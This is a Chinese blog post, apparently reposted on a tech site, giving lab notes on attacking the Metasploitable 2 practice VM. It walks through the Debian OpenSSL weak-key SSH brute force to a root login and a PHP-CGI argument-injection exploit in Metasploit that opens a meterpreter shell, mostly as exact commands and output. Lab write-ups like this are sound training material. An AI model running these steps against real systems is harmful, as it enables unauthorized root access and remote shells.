当前位置: 移动技术网 > 网络运营>安全>工具 > metasploitable 2 测试笔记

metasploitable 2 测试笔记

2018年04月03日  | 移动技术网网络运营  | 我要评论
metloitable 2 c4rp3nt3r 测试笔记
最近metasploit发布了metasploitable 2,作为一个练习用的linux操作. 采用Ubuntu 8.04的OS,搭配各种,正好满足了广大穷屌丝日益增长的装X和意淫需求.
下载地址: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
metasploit官方的用户指南,详见: https://community.rapid7.com/docs/DOC-1875
孤陋寡闻的我原来没有玩过这么高级的东西,就下载回来测试了下一把.
操起nmap 和nessus一阵狂扫发现N多服务N多高危漏洞.
 \metasploitable就好比一道练习题,做题当然要捡自己掌握不好的来做,否则失去做题的意义了.很多一击必中的漏洞和后门都没多大意思,我们对结果不太确定的东西感兴趣.先看看22端口扫描出的漏洞.
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166
 

\

 

既然是metasploitable那么就请metasploit出马吧
搜一下有木有exp
msf > search cve:2008-0166
msf >
尼玛,这个真木有,估计metasploit pro应该有这个exp吧,穷屌丝哪有钱买那个,谁有的,真心求.
我擦,穷屌丝只好搜搜exploit-db了.本地搜索的话可以先svn update一下.
1     root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl
2     Description                                                                 Path
3     --------------------------------------------------------------------------- -------------------------
4     Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple//146.c
5     Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
6     OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
7     Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
8     Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
9     Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit ()             /linux/remote/5720.py
10    OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
11    OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
12    OpenSSL remote DoS                                                          /linux/dos/12334.c
13    OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
挑一个python的exp,打开瞧瞧,就会发现贴心的用法
1     # Autor: hitz - WarCat team (warcat.no-ip.org)
2     # Collaborator: pretoriano
3     #
4     # 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

5     #
6     # 2. Extract it to a directory
7     #
8     # 3. Execute the python script
9     #     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
10    #     - execute: python exploit.py (without parameters) to display the help
11    #     - if the key is found, the script shows something like that:
12    #         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
13    #          Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
好吧开干
1     下载私钥
2     wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

3     解压之
4     tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
5     运行exploit尝试私钥登录
6     root@bt:~/Desktop# python 5720.py
7    
8     -OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
9     ./exploit.py <dir> <host> <user> [[port] [threads]]
10        <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
11        <host>: The victim host
12        <user>: The user of the victim host
13        [port]: The SSH port of the victim host (default 22)
14        [threads]: Number of threads (default 4) Too big numer is bad
15    root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root
等到花儿谢了之后,发现成功了
 

\

 

赶紧试一试.
1     root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103
2     Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100
3     metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
4    
5     The programs included with the Ubuntu system are free software;
6     the exact distribution terms for each program are described in the
7     individual files in /usr/share/doc/*/copyright.
8    
9     Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
10    applicable law.
11   
12    To access official Ubuntu documentation, please visit:
13   
14    http://help.ubuntu.com/

15   
16    You have new mail.
17    root@metasploitable:~# id
18    uid=0(root) gid=0(root) groups=0(root)
19    root@metasploitable:~#
 \我勒个去,真登录进去了,这尼玛太也容易了.
继续看看吧,别人公布的利用方法咱就不看了.
看看web目录有些什么菜吧.有一个存在漏洞的的phpMyAdmin.还有一套wiki程序以及一些专门练习web漏洞用的Mutillidae和DVWA.
\ 
练习用的太简单了咱就不玩了,TWiki也不好玩,的密码前面nessus已经扫描出来了,web程序也不好玩.扫扫目录看有什么东西没有.
找一个轻量级的perl程序随便扫扫先.结果如下
1     ++++++++++++++++++++++++++++++++++++
2     [+] Exists ->http://192.168.1.103/index.php 200 OK

3     [+] Found ->http://192.168.1.103/phpinfo.php 200 OK

4     [+] Found ->http://192.168.1.103/phpMyAdmin 200 OK

5     [-] Forbidden ->http://192.168.1.103/server-status 403 Forbidden

6     [+] Exists ->http://192.168.1.103/.bash_history 200 OK

7     [-] Forbidden ->http://192.168.1.103/cgi-bin/ 403 Forbidden

8     ++++++++++++++++++++++++++++++++++++
看看phpinfo.php吧.www.2cto.com 某国际说除了phpinfo.php啥都没有,其实有时候一个phpinfo.php足够拿个shell了.
看了下是cgi方式运行的php,访问
1     http://192.168.1.103/phpinfo.php?-s

 \尼玛这不是那个谁吗, CGI Argument Injection 漏洞啊
这次再请出metasploit出场,你是主角啊,给点力行不?
1     msf > search cve:2012-1823
2    
3     Matching Modules
4     ================
5    
6        Name                                      Disclosure Date  Rank       Description
7        ----                                      ---------------  ----       -----------
8        exploit/multi/http/php_cgi_arg_injection  2012-05-03       excellent  PHP CGI Argument Injection
9    
10    msf >
这次真有了,好吧metasploit时间到了
1     msf  exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection
2     msf  exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103
3     RHOST => 192.168.1.103
4     msf  exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
5     TARGETURI => /phpinfo.php
6     msf  exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
7     PAYLOAD => php/meterpreter/bind_tcp
8     msf  exploit(php_cgi_arg_injection) > exploit
9    
10    [*] Started bind handler
11    [*] Sending stage (39217 bytes) to 192.168.1.103
12    [*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800
13   
14    meterpreter > pwd
15    /var/www
16    meterpreter > getuid
17    Server username: www-data (33)
18    meterpreter >
 \好吧用metasploit成功了一次.总算没白叫metasploitable.
之后又测试了里面的web漏洞,没什么意思就不写了.啥时候国人搞一个类似的系统呢?放上国产的cms,别放那么多溢出和弱口令,搞个游戏或者竞赛其实挺好玩的
from:0x50sec.org

如对本文有疑问, 点击进行留言回复!!

相关文章:

  • 网络刺客2使用指南

    网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找... [阅读全文]
  • 冰河”启示录

    冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)... [阅读全文]
  • tfn2k使用方法和对策(3)

        tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm... [阅读全文]
  • tfn2k使用方法和对策(2)

        tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是... [阅读全文]
  • 火凤凰2.4使用教程

    今次给大家推荐的是阿风哥的作品:无赖小子。(way).说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗... [阅读全文]
  • tfn2k使用方法和对策(1)

        tfn2k使用方法和对策(1) 作者:佳佳 今年年初,一些黑客使用DDoS向Yahoo,eBay等著名站点发起攻击,并且使y... [阅读全文]
  • 火凤凰2.0使用教程

    火凤凰是国产木马里最先使用反弹端口的木马,其避开防火墙的能力极其出色,DELPHI编写,功能较多但是不太好用,而且没有配置服务端的改变端口功能,相对而言比较危险... [阅读全文]
  • Nmap网络安全扫描器说明(5)

    Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例-------... [阅读全文]
  • Nmap网络安全扫描器说明(3)

    Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项-------... [阅读全文]
  • 不需要任何密码就能达到进入中有冰河的机器!!!

    不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此... [阅读全文]
验证码:
移动技术网